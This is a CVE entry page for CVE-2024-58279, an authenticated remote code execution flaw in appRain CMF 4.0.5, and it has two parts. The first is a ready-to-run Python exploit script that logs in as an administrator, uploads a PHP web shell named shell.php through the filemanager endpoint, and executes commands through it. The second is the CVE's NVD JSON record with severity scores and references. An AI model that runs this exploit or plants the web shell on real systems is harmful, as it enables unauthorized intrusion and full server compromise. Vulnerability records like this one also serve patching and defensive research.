CVE-2024-58279

import requests import sys # CVE-2024-58279: appRain CMF 4.0.5 Authenticated RCE via FileManager Upload target_url = "http://target.com" # Replace with target URL username = "admin" # Replace with valid admin username password = "admin123" # Replace with valid admin password # Login to get authenticated session session = requests.Session() login_url = f"{target_url}/admin/login" login_data = { "username": username, "password": password } response = session.post(login_url, data=login_data) if "success" not in response.text.lower() and response.status_code != 200: print("[-] Login failed") sys.exit(1) print("[+] Login successful") # Prepare malicious PHP file (webshell) php_payload = "<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>" files = { "file": ("shell.php", php_payload, "application/x-php") } # Upload the malicious file via FileManager endpoint upload_url = f"{target_url}/admin/filemanager/upload" response = session.post(upload_url, files=files) if response.status_code == 200: print("[+] Malicious PHP file uploaded successfully") # Attempt to execute command shell_url = f"{target_url}/uploads/shell.php?cmd=whoami" shell_response = session.get(shell_url) print(f"[+] Command output: {shell_response.text}") else: print("[-] Upload failed")

{"cve": {"id": "CVE-2024-58279", "sourceIdentifier": "[email protected]", "published": "2025-12-10T22:16:19.543", "lastModified": "2025-12-19T17:53:02.477", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "appRain CMF 4.0.5 contains an authenticated remote code execution vulnerability that allows administrative users to upload malicious PHP files through the filemanager upload endpoint. Attackers can leverage authenticated access to generate a web shell with command execution capabilities by uploading a crafted PHP file to the site's uploads directory."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apprain:apprain:4.0.5:*:*:*:*:*:*:*", "matchCriteriaId": "C45A573A-FE6F-4BD2-ACFD-6F5D673F2B11"}]}]}], "references": [{"url": "https://github.com/apprain/apprain/archive/refs/tags/v4.0.5.zip", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.apprain.org", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/52041", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.vulncheck.com/advisories/apprain-cmf-authenticated-remote-code-execution-via-filemanager-upload", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/apprain/apprain/archive/refs/tags/v4.0.5.zip", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Product"]}]}}